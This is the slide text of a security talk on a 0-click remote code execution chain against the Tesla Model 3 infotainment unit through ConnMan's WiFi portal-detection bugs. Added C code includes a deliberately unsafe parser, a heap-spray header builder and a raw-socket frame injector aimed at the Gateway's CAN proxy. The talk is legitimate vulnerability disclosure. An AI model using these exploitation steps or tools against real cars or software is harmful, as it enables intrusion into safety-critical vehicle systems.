I feel a draft. Opening the doors and windows
0-click RCE on the Tesla Model 3
Who are we
David BERARD, security expert, @_p0ly_
Vincent DEHORS, security expert, @vdehors
Pwn2Own
Vancouver 2022
Competition organized by ZDI
- Announced on January 12, 2022
- Took place in Vancouver in mid-May 2022
- Many desktop and server software products as targets, plus the Tesla Model 3/S
Pwn2Own
Tesla rules
Attack chain: initial vector -> intermediate pivot -> final stage
- Initial vector: Tuner, WiFi chipset, Bluetooth chipset, Modem
- Intermediate pivot: Infotainment
- Final stage: VCSEC, Gateway, Autopilot
Tier 3: only 1 system compromised
Tier 2: 2 systems compromised, moving right in the chain above
Tier 1: full chain, 3 systems compromised from the initial vector to the final stage
Tier 1 & 2: possibility to win the car
Model 3 – ICE Architecture
Hardware
- Same enclosure for infotainment & autopilot
- ~$400 on eBay
Interfaces
- WiFi
- Bluetooth
- LTE
- DIAG
- CAN & POWER
Hardware components
- SoC: Intel Atom A3950
- SPI flash
- eMMC
- WiFi/BT: BCM4359
- Gateway: SPC5748GS
- SD card
Software
Infotainment:
- x64 Intel Atom
- OS: Linux 4.14, highly customized buildroot system
- Boots on eMMC / SPI
Gateway:
- PowerPC e200 in VLE mode
- OS: based on FreeRTOS
- Boots on internal flash / SDcard / tftp
Ethernet Network
Diagram: an Ethernet switch (with a management port) connects the Infotainment, the Gateway, the Autopilots, the LTE connectivity card and the Tuner ECU (DAB/HD/FM). The WiFi/BT chip (BCM4359) is attached to the Infotainment over PCIe.
Model 3 – ICE Resources
Leak
- Tesla internal documentation
- 2019.20.4.2 squashfs (rootfs)
Model 3 – ICE dump
eMMC pinout (thanks again @lewurm)
eMMC dump strategy
1. Force boot on SPI: if the eMMC is not readable, the CPU boots on the SPI flash and the eMMC is still powered
   - Force an eMMC failure by shorting the eMMC CMD signal
   - Connect the SDIO channel of an SBC (BeagleBone B)
2. Linux detects the eMMC card: it can be dumped or written with dd or other tools
   - The Linux mmc driver has to be patched to slow down the communication, as our setup does not support high frequencies
3. Disconnect the SBC and reboot the ICE: using short wires lets the ICE boot on eMMC in HS400 mode without perturbation
Firmware
History of access to firmwares
- 16 Apr 2021: 2019.20.4.2 (leak)
- 16 Jun 2021: 2020.48.35.5 (dump)
- 7 Feb 2022: 2021.44.30.7 (Tesla, via ZDI)
- 29 Mar 2022: 2022.8.2 (Tesla, via ZDI)
- 29 Apr 2022: 2022.12.22 (Tesla, via ZDI)
- Mid-May 2022: Pwn2Own
Attack vectors
Objectives
- We want an RCE without any user interaction
- Bonus: fits the Pwn2Own rules to allow a Tier 1 (or 2) entry
Possible targets
- LTE connectivity card: two systems are hosted on the LTE card, the baseband and a Linux system => 2 hops to the Infotainment
- Tuner ECU: 1 hop to the Infotainment (ECU required)
- WiFi/BT chipset (BCM4359): directly attached in PCIe to the Infotainment; no vulnerability found in the firmware
- Infotainment system (kernel WiFi/BT stacks & network management stack): directly on the target; limited attack surface & not valid for a Tier 1 entry
Attack vector
Autoconnect WiFi
Infotainment target: additional attack surface
- Full kernel WiFi stack
- Kernel network stack
- Network manager's (ConnMan) additional surface
- Applications that use the Internet connection (e.g. the VPN client)
Public research
We could have named this presentation: TBONE 2.0
Tooling
Emulator with WiFi connection
- VM: use Qemu to run the ICE software
- Kernel: use the kernel config from the firmware and add the options Qemu requires
- RootFS: patch some init scripts, add Xorg drivers, add the WiFi firmware, add SSH root access
- Network: USB passthrough of a WiFi dongle, TAP interface for the internal network, Gateway simulator in Python
ConnMan
Network manager
- Open source code
- Used on Linux-based embedded devices
- DHCP: IPv4 network config
- DNS: client and proxy
- WISPR: portal detection
- Plugins: work with other services (WiFi, Ethernet, Bluetooth, oFono)
ConnMan
Open source Connection Manager
D-Bus communication (IPC): all communication with other services goes through the D-Bus server. A custom Tesla UI program manages ConnMan through its D-Bus interface and displays the current connection status on the Infotainment's screen.
GLib (LIB): ConnMan is written in C and uses a lot of GLib features:
- GLib event loop (the application is single-threaded)
- Utilities (strings, hash tables, I/O)
- A few allocations use the GLib allocator
GWeb / GResolv (MODULE): ConnMan's own implementation of the HTTP and DNS protocols:
- GWeb: custom implementation of HTTP (GET/POST queries)
- GResolv: sends a DNS query and handles the response
ConnMan surface
Limited attack surface
- DHCP: IPv4 DHCP implementation; a few bugs already discovered and patched
- IPv6: disabled in the kernel configuration
- WISPR: portal detection and connectivity check
- DNS proxy: replaced by dnsmasq
- WPAD: proxy script handling, disabled during an update
- NTP: disabled by the Tesla UI application
- WiFi / wpa_supplicant: small surface from the WiFi, only some user-controlled input (network SSIDs, passphrase, states, ...)
- oFono: small surface from the connectivity card data
WiFi management
How the Tesla connects to a WiFi AP
1. Scan: a WiFi scan is performed periodically or on UI request
2. Known network: (1) user network, (2) Tesla Service
3. Auth.: 802.11 authentication
4. DHCP: (1) Discover request, (2) Request request
5. WISPR: HTTP GET request
WISPR
Wispers a payload directly to the Tesla
Vulnerabilities
Vulnerabilities we found in the remote surface (ConnMan)
OOB byte swap in GWeb (CVE-2022-32292)
- Bug in the HTTP parsing function
- Allows changing a 0x0A byte into a 0x00 byte after the end of an allocation
- Difficult to exploit without an infoleak
Double free in WISPR (CVE-2022-32293)
- Only used to crash ConnMan quickly, to start with a clean heap after a restart of the service
- We only saw the exploitability of this bug at the end!
OOB byte swap
One bug sufficient to get RCE
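The primitive above is a single 0x0A turned into 0x00 past the end of the buffer that holds received HTTP data. The program below is an added illustration of that bug class, written for this page and not taken from ConnMan's GWeb: a minimal line reader that NUL-terminates the first newline, once with a search bound that is not the number of bytes received (the stale or oversized bound is assumed, as the cause of the overshoot) and once bounded correctly, run over a small model of two adjacent heap chunks.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Constructed illustration of the bug class, not ConnMan's own code: a
 * line-oriented HTTP reader fills a heap buffer and turns the first 0x0A into
 * a 0x00 so the header line can be handled as a C string. If the search is
 * bounded by something other than the number of bytes actually received, the
 * first 0x0A after the data, possibly in the next heap chunk, becomes 0x00.
 */

/* Unsafe: the search bound (search_len) is not the received length. */
int terminate_line_unsafe(unsigned char *buf, size_t received, size_t search_len)
{
    (void)received;                         /* bug: the real bound is ignored */
    unsigned char *pos = memchr(buf, '\n', search_len);
    if (pos == NULL)
        return -1;
    *pos = '\0';                            /* 0x0A -> 0x00, wherever it was */
    return (int)(pos - buf);
}

/* Safe: never inspect bytes this read did not fill. */
int terminate_line_safe(unsigned char *buf, size_t received, size_t search_len)
{
    if (received > search_len)
        return -1;
    unsigned char *pos = memchr(buf, '\n', received);
    if (pos == NULL)
        return -1;                          /* incomplete line: wait for more data */
    *pos = '\0';
    return (int)(pos - buf);
}

/* Model of the heap: one buffer chunk of CHUNK bytes, of which RECEIVED were
 * filled with request data containing no newline, directly followed by a
 * neighbouring chunk whose first byte happens to be 0x0A. */
#define CHUNK     16
#define RECEIVED  8
#define NEIGHBOUR 4

/* Runs one reader over the model; returns 1 if the neighbour's 0x0A survived,
 * 0 if it was swapped to 0x00. */
int neighbour_intact(int (*reader)(unsigned char *, size_t, size_t))
{
    unsigned char heap[CHUNK + NEIGHBOUR];
    memset(heap, 'A', CHUNK);               /* our chunk: request bytes, no 0x0A */
    memset(heap + CHUNK, 0x0A, NEIGHBOUR);  /* neighbour chunk begins with 0x0A */
    /* The bound handed to the reader overshoots the chunk, as a stale size would. */
    reader(heap, RECEIVED, CHUNK + NEIGHBOUR);
    return heap[CHUNK] == 0x0A;
}

int main(void)
{
    unsigned char line[] = "GET / HTTP/1.0\r\nHost: example\r\n";
    printf("safe reader: newline at index %d\n",
           terminate_line_safe(line, sizeof line - 1, sizeof line));
    printf("neighbour intact with safe reader:   %d\n", neighbour_intact(terminate_line_safe));
    printf("neighbour intact with unsafe reader: %d\n", neighbour_intact(terminate_line_unsafe));
    return 0;
}
```

The safe variant also returns -1 on a partial line instead of touching memory, which is the behaviour a parser fed by a network socket must have: the terminator may simply not have arrived yet.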
Allocation spray
Based on g_hash_table insertion/replacement
Advantages:
- Controlled size of the new allocation
- Content partially controlled
- The allocation can be freed by adding new content to the same header, but a new (bigger) one is made at the same time
Disadvantages:
- Allocation kept only during the HTTP session
- Bad characters in the content: 0x00 and 0x0A
- Triggers other allocations/frees
Chaining requests
Useful exploitation primitive
- Heap shaping kept: the first heap shaping remains until the end of the second WISPR request
- Vulnerable buffer placement: the vulnerable buffer is allocated before the HTTP request is sent, but the one for WISPR #2 can be placed with the spray of WISPR #1
Heap shaping
1. Resize internal buffers
2. Fill existing holes and the tcache
3. Allocate chunks for hole placement
4. Grow chunks to create holes (> 0x810)
The allocation made after the OOB is controlled. The shaping is resilient to unexpected allocations because it uses dedicated sizes: any other chunk size lands in a different hole.
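Both the header spray and the hole sizes of the shaping plan depend on one calculation: which malloc chunk a header value of a given length ends up in. The code below is an added example for this page, not the authors' exploit; it assumes 64-bit glibc chunk sizing (chunk = max(0x20, (request + 8 + 15) & ~15)) and that a sprayed header value is copied with g_strdup(), i.e. a request of strlen(value) + 1 bytes from the system allocator. It derives the value length for a target chunk size, emits the header line with a filler that avoids the two bad characters, and checks the line before it is sent.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example, not the authors' exploit: sizing the header values of the
 * g_hash_table spray so that each copy lands in the malloc chunk size the
 * heap shaping plan calls for. Assumes 64-bit glibc sizing and a g_strdup()
 * copy (request = strlen + 1) served by system malloc.
 */

#define MALLOC_ALIGN_MASK 15u
#define SIZE_SZ           8u
#define MIN_CHUNK         0x20u

/* malloc chunk size for a request of `request` bytes. */
size_t chunk_size_for_request(size_t request)
{
    size_t chunk = (request + SIZE_SZ + MALLOC_ALIGN_MASK) & ~(size_t)MALLOC_ALIGN_MASK;
    return chunk < MIN_CHUNK ? MIN_CHUNK : chunk;
}

/* Longest string whose g_strdup() copy (strlen + 1) still fits in `chunk`;
 * `chunk` must be a valid chunk size (multiple of 16, >= 0x20). */
size_t max_strlen_for_chunk(size_t chunk)
{
    return chunk - SIZE_SZ - 1;
}

/* Emits "Name: vvvv...\r\n" with a value of exactly value_len bytes. The
 * filler must avoid both bad characters (0x00 ends the string, 0x0A ends the
 * header line). Returns bytes written, 0 on error. */
size_t build_spray_header(const char *name, size_t value_len, unsigned char fill,
                          unsigned char *out, size_t out_len)
{
    size_t name_len = strlen(name);
    size_t total = name_len + 2 + value_len + 2;
    if (fill == 0x00 || fill == 0x0A || total > out_len)
        return 0;
    memcpy(out, name, name_len);
    out[name_len] = ':';
    out[name_len + 1] = ' ';
    memset(out + name_len + 2, fill, value_len);
    out[total - 2] = '\r';
    out[total - 1] = '\n';
    return total;
}

/* Pre-send check: exactly one 0x0A (the terminator) and no 0x00 in the line. */
int spray_line_is_clean(const unsigned char *line, size_t len)
{
    if (len == 0 || line[len - 1] != '\n')
        return 0;
    return memchr(line, '\n', len - 1) == NULL && memchr(line, '\0', len) == NULL;
}

int main(void)
{
    unsigned char line[0x900];
    size_t want = 0x810;                       /* hole size from the shaping plan */
    size_t value_len = max_strlen_for_chunk(want);
    size_t n = build_spray_header("X-Spray", value_len, 'A', line, sizeof line);
    printf("chunk 0x%zx <- strlen 0x%zx, header line of %zu bytes, clean=%d\n",
           chunk_size_for_request(value_len + 1), value_len, n,
           spray_line_is_clean(line, n));
    return 0;
}
```

Re-sending the same header name with a longer value is what the slide describes as freeing the old allocation while a bigger one is made at the same time: compute the new length with the same two functions and the old chunk goes back to the allocator at a size you chose.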
Exploiting the bug
How to transform a byte swap into a chunk takeover
Byte swap -> double reference -> arbitrary chunk takeover
Infoleak
From chunk takeover to libc pointer
Getting an infoleak... 4 times
Patching the DHCP hostname string
- DHCP renew is broken in ConnMan even in normal operation, because of a Tesla commit
Leak: known libc pointer (until the first null byte)
Code execution
One shot code execution
1. Same method as for the leak: the same actions are performed another time to get another double reference on a controlled chunk
2. One arbitrary write: known (and simple) technique to get an arbitrary write from libc metadata corruption, tcache poisoning (https://github.com/shellphish/how2heap)
3. libc hook patched: the well-known realloc hook (__realloc_hook) is patched to point at a gadget inside a library
4. Reallocate a buffer: a lot of data is sent to the receiving buffer, which triggers a realloc() inside GLib while resizing it; the first argument points at controlled memory
5. Stack pivot + ROP: one gadget is used to move the stack into the controlled buffer, then a ROP chain is executed
Code execution
One shot code execution... but:
Tesla updated the libc from 2.29 to 2.34 two weeks before the contest
- One arbitrary write: tcache poisoning now needs an additional infoleak
- libc hook patched: the libc hooks have been removed
Code execution (2)
Execution flow hijacking
Stager
Code injection
Sandboxes
Restricted code execution
Network
A hole in the sandboxing
Raw socket
Packet injection
Diagram: from the Infotainment (ConnMan, eth0), packets are sent through the Ethernet switch to UDP port 4321 on the Gateway, whose CAN proxy & filter forwards them onto the CAN networks to the other ECUs.
CAN messages
Construct messages
- Partial CAN database available online: https://github.com/joshwardell/model3dbc
- libQtCarCANData.so.1.0.0 contains all the information needed to decode the messages
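Going from a DBC entry to bytes on the bus means packing each signal's scaled raw value at its start bit with the right bit order. The program below is an added example written for this page, not the authors' code and not Tesla's database: a generic packer and unpacker for Intel (little-endian) DBC signals, exercised on a message whose layout and identifier (0x123) are constructed for the demo. It also rejects values that do not fit their field, which is the check you want before injecting anything.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example, not the authors' code and not Tesla's CAN database: packing
 * physical values into a classic CAN frame from DBC-style signal definitions
 * (Intel/little-endian bit order, factor, offset). The signal layout and the
 * identifier 0x123 below are constructed for the demo.
 */

typedef struct {
    const char *name;
    unsigned start_bit;     /* position of the signal's LSB within the 64-bit payload */
    unsigned bit_len;
    double factor;
    double offset;
} can_signal_t;

typedef struct {
    uint32_t id;            /* 11-bit standard identifier */
    uint8_t dlc;
    uint8_t data[8];
} can_frame_t;

/* raw = round((phys - offset) / factor), written LSB first from start_bit.
 * Returns 0 on success, -1 if the field is malformed or the value does not fit. */
int can_pack_signal(can_frame_t *f, const can_signal_t *s, double phys)
{
    if (s->bit_len == 0 || s->bit_len > 64 || s->start_bit + s->bit_len > 64)
        return -1;
    double scaled = (phys - s->offset) / s->factor;
    if (scaled < 0.0)
        return -1;                      /* unsigned fields only in this example */
    uint64_t raw = (uint64_t)(scaled + 0.5);
    if (s->bit_len < 64 && (raw >> s->bit_len) != 0)
        return -1;                      /* value overflows the field */
    for (unsigned i = 0; i < s->bit_len; i++) {
        unsigned bit = s->start_bit + i;
        uint8_t mask = (uint8_t)(1u << (bit % 8));
        if ((raw >> i) & 1)
            f->data[bit / 8] |= mask;
        else
            f->data[bit / 8] &= (uint8_t)~mask;
    }
    return 0;
}

/* Inverse of can_pack_signal, used to check a frame before sending it. */
double can_unpack_signal(const can_frame_t *f, const can_signal_t *s)
{
    uint64_t raw = 0;
    for (unsigned i = 0; i < s->bit_len; i++) {
        unsigned bit = s->start_bit + i;
        raw |= (uint64_t)((f->data[bit / 8] >> (bit % 8)) & 1u) << i;
    }
    return (double)raw * s->factor + s->offset;
}

/* Constructed message: a 16-bit speed in 0.1 km/h units in bytes 0-1 and a
 * 4-bit rolling counter in the low nibble of byte 6. */
static const can_signal_t SIG_SPEED   = { "Speed",    0, 16, 0.1, 0.0 };
static const can_signal_t SIG_COUNTER = { "Counter", 48,  4, 1.0, 0.0 };

/* Builds the demo frame; returns 0 on success, -1 if a value does not fit. */
int build_demo_frame(can_frame_t *f, double speed_kph, unsigned counter)
{
    memset(f, 0, sizeof *f);
    f->id = 0x123;                      /* constructed identifier */
    f->dlc = 8;
    if (can_pack_signal(f, &SIG_SPEED, speed_kph) != 0)
        return -1;
    return can_pack_signal(f, &SIG_COUNTER, (double)counter);
}

int main(void)
{
    can_frame_t f;
    if (build_demo_frame(&f, 100.0, 5) != 0)
        return 1;
    printf("id=0x%03x dlc=%u data=", (unsigned)f.id, f.dlc);
    for (int i = 0; i < f.dlc; i++)
        printf("%02x", f.data[i]);
    printf("  speed=%.1f counter=%.0f\n",
           can_unpack_signal(&f, &SIG_SPEED), can_unpack_signal(&f, &SIG_COUNTER));
    return 0;
}
```

Real DBC files also carry Motorola (big-endian) signals and signed fields; the loop above is the Intel case only, and the "does it fit" check is the part that matters most when a message crafted from a partial database is about to be sent to a filter you do not fully understand.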
Raw socket
Packet injection
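With only a raw socket available, the Ethernet, IPv4 and UDP headers of the datagram for port 4321 have to be written by hand, checksums included. The program below is an added example for this page, not the authors' code: it builds such a frame, verifies it the way a receiver would, and on Linux injects it through an AF_PACKET socket on the interface named on the command line. The MACs, addresses and payload are constructed; the slide gives the destination port but not the datagram format the Gateway expects, so the payload is filler.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef __linux__
#include <arpa/inet.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <sys/socket.h>
#include <unistd.h>
#endif

/* Added example, not the authors' code: hand-built Ethernet/IPv4/UDP frame for
 * injection through a raw socket. Addresses and payload are constructed. */

#define ETH_HLEN_ 14
#define IP_HLEN_  20
#define UDP_HLEN_ 8

/* One's-complement accumulation over big-endian 16-bit words. */
static uint32_t csum_add(uint32_t sum, const uint8_t *p, size_t len)
{
    while (len > 1) { sum += (uint32_t)((p[0] << 8) | p[1]); p += 2; len -= 2; }
    if (len)
        sum += (uint32_t)(p[0] << 8);
    return sum;
}

static uint16_t csum_finish(uint32_t sum)
{
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)~sum;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }

/* Pseudo-header (src, dst, zero, proto 17, UDP length) + UDP segment sum. */
static uint32_t udp_sum(const uint8_t *ip, const uint8_t *udp, size_t udp_len)
{
    uint8_t pseudo[12];
    memcpy(pseudo, ip + 12, 8);
    pseudo[8] = 0; pseudo[9] = 17;
    put16(pseudo + 10, (uint16_t)udp_len);
    return csum_add(csum_add(0, pseudo, 12), udp, udp_len);
}

/* Builds eth/ip/udp/payload into out; returns the frame length or 0 on error.
 * IPs and ports are given in host byte order. */
size_t build_udp_frame(uint8_t *out, size_t out_len,
                       const uint8_t dst_mac[6], const uint8_t src_mac[6],
                       uint32_t src_ip, uint32_t dst_ip,
                       uint16_t src_port, uint16_t dst_port,
                       const uint8_t *payload, size_t payload_len)
{
    size_t udp_len = UDP_HLEN_ + payload_len, ip_len = IP_HLEN_ + udp_len;
    if (ip_len > 0xFFFF || ETH_HLEN_ + ip_len > out_len)
        return 0;
    uint8_t *eth = out, *ip = out + ETH_HLEN_, *udp = ip + IP_HLEN_;
    memcpy(eth, dst_mac, 6);
    memcpy(eth + 6, src_mac, 6);
    put16(eth + 12, 0x0800);                      /* EtherType IPv4 */
    memset(ip, 0, IP_HLEN_);
    ip[0] = 0x45;                                 /* version 4, IHL 5 */
    put16(ip + 2, (uint16_t)ip_len);
    ip[6] = 0x40;                                 /* don't fragment */
    ip[8] = 64;                                   /* TTL */
    ip[9] = 17;                                   /* protocol UDP */
    put16(ip + 12, (uint16_t)(src_ip >> 16)); put16(ip + 14, (uint16_t)src_ip);
    put16(ip + 16, (uint16_t)(dst_ip >> 16)); put16(ip + 18, (uint16_t)dst_ip);
    put16(ip + 10, csum_finish(csum_add(0, ip, IP_HLEN_)));
    put16(udp, src_port);
    put16(udp + 2, dst_port);
    put16(udp + 4, (uint16_t)udp_len);
    put16(udp + 6, 0);
    memcpy(udp + UDP_HLEN_, payload, payload_len);
    uint16_t c = csum_finish(udp_sum(ip, udp, udp_len));
    put16(udp + 6, c == 0 ? 0xFFFF : c);         /* 0 means "no checksum" in UDP */
    return ETH_HLEN_ + ip_len;
}

/* Receiver-side check: with the checksum fields in place, both sums fold to 0. */
int frame_checksums_ok(const uint8_t *frame, size_t len)
{
    if (len < ETH_HLEN_ + IP_HLEN_ + UDP_HLEN_)
        return 0;
    const uint8_t *ip = frame + ETH_HLEN_, *udp = ip + IP_HLEN_;
    size_t udp_len = ((size_t)udp[4] << 8) | udp[5];
    if (udp_len < UDP_HLEN_ || ETH_HLEN_ + IP_HLEN_ + udp_len > len)
        return 0;
    return csum_finish(csum_add(0, ip, IP_HLEN_)) == 0 &&
           csum_finish(udp_sum(ip, udp, udp_len)) == 0;
}

#ifdef __linux__
/* Injects the frame on `ifname` through an AF_PACKET socket (needs CAP_NET_RAW). */
int send_raw_frame(const char *ifname, const uint8_t *frame, size_t len)
{
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (fd < 0)
        return -1;
    struct sockaddr_ll sll;
    memset(&sll, 0, sizeof sll);
    sll.sll_family = AF_PACKET;
    sll.sll_protocol = htons(ETH_P_IP);
    sll.sll_ifindex = (int)if_nametoindex(ifname);
    sll.sll_halen = 6;
    memcpy(sll.sll_addr, frame, 6);               /* destination MAC */
    ssize_t n = sendto(fd, frame, len, 0, (struct sockaddr *)&sll, sizeof sll);
    close(fd);
    return n == (ssize_t)len ? 0 : -1;
}
#endif

int main(int argc, char **argv)
{
    static const uint8_t dmac[6] = {0x02,0,0,0,0,2}, smac[6] = {0x02,0,0,0,0,1};
    static const uint8_t payload[] = "demo";      /* constructed filler, not a Gateway message */
    uint8_t frame[128];
    size_t n = build_udp_frame(frame, sizeof frame, dmac, smac,
                               0xC0A80A01u, 0xC0A80A02u, 40000, 4321, payload, 4);
    printf("frame of %zu bytes, checksums ok=%d\n", n, frame_checksums_ok(frame, n));
    (void)argc; (void)argv;
#ifdef __linux__
    if (argc > 1 && n)
        return send_raw_frame(argv[1], frame, n);
#endif
    return 0;
}
```

Run it with no arguments to only build and verify the frame; pass an interface name (for instance eth0) as the first argument to inject it, which requires CAP_NET_RAW. A kernel delivering the datagram to the Gateway's UDP 4321 listener will drop it silently if either checksum is wrong, so the receiver-side check is worth running on every crafted frame before it goes out.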
Demo
This was our first attempt on a real car
Fixes
ConnMan & kernel
- ConnMan: CVE-2022-32293
- ConnMan: CVE-2022-32292
- Kernel: CVE-2022-42430
- Kernel: CVE-2022-42431
Conclusion
- Long work: almost 1 year
- Back to a non-trivial vulnerability after a long vulnerability research
- Working in parallel with the updates made us rewrite the exploit multiple times
- A lot of help from ZDI and Tesla at the end: Tesla provided us an ECU that can receive updates, ZDI and Tesla gave us updates, and the version was frozen 2 weeks before the event. Thanks to them
- It was fun
- We didn't win the car :( even if the impact is the same as some Tier 2 entries